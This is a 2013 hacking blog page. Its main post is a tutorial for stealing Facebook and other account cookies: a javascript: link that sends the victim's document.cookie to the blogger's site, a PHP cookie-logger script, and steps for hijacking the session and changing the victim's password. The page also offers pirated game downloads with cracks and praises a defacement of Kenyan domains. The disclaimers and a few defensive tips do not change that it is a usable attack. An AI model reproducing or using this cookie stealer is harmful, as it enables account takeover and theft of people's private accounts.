Wednesday, 17 April 2013

How to hack Facebook??(All Methods)

 normally every day some one ask me how to hack facebook?, hey do u know how to hack fb?,plz hack this account, i need my gf's password, etc  now you are one of them then read this whole article and you will come to know how difficult to hack and not always you get successive result, but yes you can hack facebook account :) ;)


The Only Two Methods By Which You Can Hack Facebook Is
  • Hire A Professional Hacker Who Will Hack For You
  • Or Just Learn All These Methods which i'm Gonna Provide you

Facebook Hacking Methods Are Following:

1.    Session Hijacking Attack
2.    Facebook Security
3.    Cookie Stealing Attack
4.    Keylogging
5.    Clickjacking
6.    Tabnabbing
7.    Remote Administration Tools
8.    Social Engineering Attack
9.   Phishing attack
10.  Using 3 Fake Friends Method

  •  Session Hijacking Attack :- What Is Session Hijacking Attack ? Session hijacking, also known as TCP session hijacking, is a method of taking over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. Once the user's session ID has been accessed (through session prediction), the attacker can masquerade as that user and do anything the user is authorized to do on the network.

  •     Facebook Security :- When you bookmark the URL for Facebook or any of your other social networks, be sure to use HTTPS instead of HTTP. This encrypts your communications. In fact, you will have to temporarily disable this feature any time you give access to a new application. That alone should give you confidence that you have achieved a greater level of protection.
  •  Cookie Stealing Attack :- In this tutorial i will explain how you can hack a Facebook/twitter accounts by stealing cookies. This method works only when the victims computer is in a LAN (local area network ).Best place to try out this is in schools ,collages ,cafes . where computers are connected in LAN .Before i proceed let me first...
  •     Keylogging :- What Is Keyloggers? Using key logger utility you will be able to establish full control over your computer. You will also find out, what was going on your computer in your absence: what was run and typed etc which act as best children internet protection software. Using the keylogging program constantly,...
  •     Clickjacking :- What is Clickjacking? Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security weakness in web browsers that allows...
  •     Tabnabbing :- Hey friends,It's Chris Defaulter Valentine.An Microsoft Certified Systems Engineer (MCSE),Internet Marketer IIT hacker I Have 10 Years' Experience Circumventing Information Security Measures And Can Report That I've Successfully Compromised All Systems That I Targeted For Unauthorized Access Except One. I Have...
  •  Remote Administration Tools :- A remote administration tool (or RAT) is a program that allows certain persons to connect to and manage remote computers in the Internet or across a local network. A remote administration tool is based on the server and client technology. The server part runs on a controlled computer and receives commands...
  •  Social Engineering Attack :- I myself have had a few people in the past ask me questions on social engineering. I always say to anyone, you need to imagine social engineering as a game. But before i talk about the 'Game', I want to go into detail about Basic knowledge and self preparation. Basic knowledge and self preparation: It's...
  •     Phishing attack :- Phishing - is an e-mail fraud method in which the perpetrator sends out legitimate-looking email in an attempt to gather personal and financial information from recipients. Typically, the messages appear to come from well known and trustworthy Web sites. Web sites that are frequently spoofed by phishers include...
  •     Using 3 Fake Friends Method :- Hack Facebook Account" is most popular term is the in Web, Previously I posted many articles on "Hack Facebook Accounts" with Keyloggers, phishing, etc but that Hacking Of Facebook Account methods are not working fine now a days. So Hackers have to go smarter and we have found a new security hole
Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get up to 40 years of imprisonment, if got caught in doing so.  

How to hack into an email/facebook/any account - Cookie hijacking


 yesterday  i got mail about cookie hijacking so i find the best way to do and i post it enjoy

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a Cookie Logger?

A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger


Note :- This Tutorial is For Education Purpose Only… & Its For Better Security For Ur Self…


Step 1  :- First you have to create a file which can capture a person's cookie.So follow the following process.  

this is last step actually ↓ 

  Give this code to victim to run in his browser (notice that here site name is way2h.blogspot.com)


javascript:document.location='http://way2h.blogspot.com/cookie.php?ex='.concat(escape(document.cookie)); 


Step 2 :- Now you have to change "http://www.way2h.blogspot.com/" to your site, Remember one thing you should not upload the files into a directory.


Step 3 :- Copy the Following Script into a Notepad File and Save the file as cookie.php:

  <?php
$filename = "logfile.txt";
if (isset($_GET["ex"]))
{
if (!$handle = fopen($filename, 'a'))
{
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["ex"]) === FALSE)
{

exit;
}
}

header("Location: http://ilovemessenger.msn.com");
fclose($handle);
exit;
}
exit;
?>


Upload this file to your server

 cookie.php -> http://www.yoursite.com/cookielogger.php

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

www.ofees.net
www.t35.com
www.ripway.com
http://my3gb.com/
http://000webhost.com/

Step 5:- Now your cookie logger is ready to be used. Now All U Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them…

Note :- Give Ur Victim The Link Of GIF File… 

javascript:document.location='http://way2h.blogspot.com/cookie.php?ex='.concat(escape(document.cookie)); 

So the person who click it will think it is fun but it redirects to http://ilovemessenger.msn.com


Step 6 :- So if anyone open you it  will get a the cookie in the logfile.txt


Step 7 :- And something like this will be stored in your "logfile.txt"

 phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 8 :- To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Now for this you will need a firefox addon named "Add and edit cookies

Note :- Make Sure that ur Victim should be Online because u are Hijacking ur Victim’s Session…


So if the Victim clicks on Logout you will also Logout automatically…
but once you have changed the password then you can again login with the new password… but the victim would not be able to login with it…

MUST READ :- I don’t take any responsibility for what you do with this script…Its Only for Educational purpose only…


How To Get Secure From Cookie Loggers / Cookie Stealer ???

  •  use NO SCRIPT (its a firefox addon )  this is best rest of other :P
  • Don’t Click On Any Links Given By Anyone…
  • Use Secure Connection Security In Facebook…
  • Use Login Notifications For Better Security…
  • Don’t Click On SPAM Links Videos Or Pics…
  • Never Ever Try RATS or KeyLoggers…
  • Be Safe…Don’t Use Any Softwares For Hacking…Coz All Are Fakes…
  • Hacking is Not Playing With SomeOne’s Account… 
  • Real Hacking is Much More Than It…
All The Hackers are Not Same… We are Humans & We Had Heart Also…

Tuesday, 16 April 2013

The Bard's Tale - PC Game

The Bard's Tale

  • Developer: InXile Entertainment
  • Publisher: Vivendi Games
  • Genre: Action RPG
  • Release Date: June 22, 2005 (US)

About The Bard's Tale

Loosely based on (or "inspired by", if you will) the classic The Bard's Tale series that started out as a 1985 Apple II RPG, this new tale brings a fresh dose of comedy to the RPG world set with a 3D isometric engine similar titles such as Diablo and Fallout. Is a dragon terrorizing the locals? The Bard will take care of it ... for the right price. Local princess held captive? The Bard is your man ... as long as she's hot.

Minimum System Requirements

  • OS: Windows 2000/XP
  • Processor: Pentium 3 @ 933 MHz or Equivalent
  • Memory: 256 MB
  • Hard Drive: 6 GB Free
  • Video Memory: (nVidia GeForce 5200/ATI Radeon 8500)
  • Sound Card: DirectX Compatible
  • DirectX: 9.0
  • Keyboard & Mouse
  • CD/DVD Rom Drive

Recommended System Requirements

  • OS: Windows 2000/XP
  • Processor: Pentium 4 @ 2 GHz or Equivalent
  • Memory: 512 MB
  • Hard Drive: 6 GB Free
  • Video Memory: nVidia GeForce FX 5700
  • Sound Card: DirectX Compatible
  • DirectX: 9.0
  • Keyboard & Mouse
  • CD/DVD Rom Drive

Download The Bard's Tale – Direct Links

Part 0 – Installer

Part 1 – 620 MB

Part 2 – 620 MB

Part 3 – 620 MB

Part 4 – 620 MB

Part 5 – 620 MB

Part 6 – 620 MB

Part 7 – 620 MB

Part 8 – 620 MB

Part 9 – 620 MB

Part 10 – 44 MB

Crack

www.elj-games.blogspot.com

Monday, 15 April 2013

Google.co.mw, MSN, Yahoo, fanta Kenya Hacked by TiGER-M@TE, Bangladeshi Hacker

Google.co.mw, MSN, Yahoo, fanta, hp, dell and many local domains of Kenya hacked and defaced by TiGER-M@TE, Bangladeshi Hacker. TiGER-M@TE is considers as one of most dangerous blackhat of world. There is not any specific reason mention about this hack on deface page but this rise many questions for security experts that how much these hacker are getting powerful.


Deface page say's:
"HackeD
By 
TiGER-M@TE

#Bangladeshi HackeR

Greetz : kinG oF coNTroL ; Barbaros-DZ ; F0RTYS3V3N ; aBu.HaliL501 ; W7sH.SyRiA ; h311 c0d3 ; m1l05 ; j0 ; l0calh0st ; Ne0-h4ck3r ;

# TiGER-M@TE
# localhost_80@programmer.net
© UNDERGROUND HACKERS 2007 - 2013

#EOF"

Hacked Sites List:
www.microsoft.co.ke
www.msn.co.ke
www.youtube.co.ke
www.bing.co.ke
www.skype.co.ke
www.hp.co.ke
www.westernunion.co.ke
www.dell.co.ke
www.google.co.ke

Mirrors:
http://www.zone-h.org/archive/notifier=tiger-m@te

DNS spoofing Attack Detail's:

DNS spoofing (or DNS cache poisoning) is a computer hacking attack, whereby data is introduced into a Domain Name System (DNS) name server's cache database, causing the name server to return an incorrect IP address, diverting traffic to another computer (often the attacker's).
Every country have registrar server which return the IP of local huge sites like google, msn etc. If registrar sever is compromised then we can redirect all those domains to specific ip which make it believe that sites are hacked. Basically sites are functioning properly, only there ip is hacked to hacked ip.

Kali Linux 1.0.2 Download ISO Image. From Creater Of BackTrack (way2h)





The most versatile, The most awaited and advanced penetration testing Linux distribution, Kali Linux has been released from the creator of BackTrack Linux. Today, We will discuss its features

  Kali Linux is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged.

 According to Offensive Security, Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.After a year of silent development, Offensive Security is proud to announce the release.

Being based on Debian (Debian Wheezy), Kali also uses its parent distribution’s installation program, the first Debian-based distribution I have reviewed in a while that uses the Debian Installer (DI). What that means is that Kali gives you more features (during installation) than BackTrack, Ubuntu or any other
 distribution derived from Ubuntu. This screen shot shows the installer’s disk partitioning options.

 The Kali Linux ARM Architecture images work like charm on Samsung ARM Chromebook, Raspberry Pi, ODROID U2 / X2 and SainSmart SS808.

  • What's New in Kali Linux:
  • 300 penetration testing tools.
  • FHS (Filesystem Hierarchy Standard) compliant.
  • Enhanced and vast wireless device support.
  • Custom kernel patched for injection.
  • GPG signed packages and repos.
  • Multi-language and completely customizable.
  • ARMEL and ARMHF support.
  • Kali is currently available for the following ARM devices:
    • rk3306 mk/ss808
    • Raspberry Pi
    • ODROID U2/X2
    • Samsung Chromebook

Friday, 12 April 2013

Order of War - PC Game

Order of War

  • Developer: Wargaming.net
  • Publisher: Square Enix
  • Genre: Strategy
  • Release Date: September 22, 2009 (US)

About Order of War

In the summer of 1944, the Second World War entered its end-game when the Allies launched two major operations that would drive back German forces on both the Western and Eastern Fronts at once. In the ultimate test of military strategy, Order of War will challenge you not only to lead America's finest to victory in the West, but also place you in command of German forces charged with repelling the Red Army's seemingly unstoppable offensive in the East. Even the keenest military minds will find that it's one thing to make history, but quite another to change it. Do you have what it takes to command?

Minimum System Requirements

  • OS: Windows XP SP2
  • Processor: Pentium 4 @ 3 GHz or Dual Core @ 2 GHz
  • Memory: 2 Gb
  • Hard Drive: 10 Gb free
  • Video Memory: 256 Mb
  • Video Card: NVIDIA GeForce 7600
  • Sound Card: DirectX Compatible
  • DirectX: 9.0c
  • Keyboard
  • Mouse
  • DVD Rom Drive

Recommended System Requirements

  • OS: Windows Vista
  • Processor: Dual Core @ 3.2 GHz
  • Memory: 2 Gb
  • Hard Drive: 10 Gb free
  • Video Memory: 512 Mb
  • Video Card: NVIDIA GeForce 9800
  • Sound Card: DirectX Compatible
  • DirectX: 10
  • Keyboard
  • Mouse
  • DVD Rom Drive

Download Order of War – Direct Links

Part 1 – 700 MB

Part 2 – 700 MB

Part 3 – 700 MB

Part 4 – 700 MB

Part 5 – 667 MB

Crack

www.elj-games.blogspot.com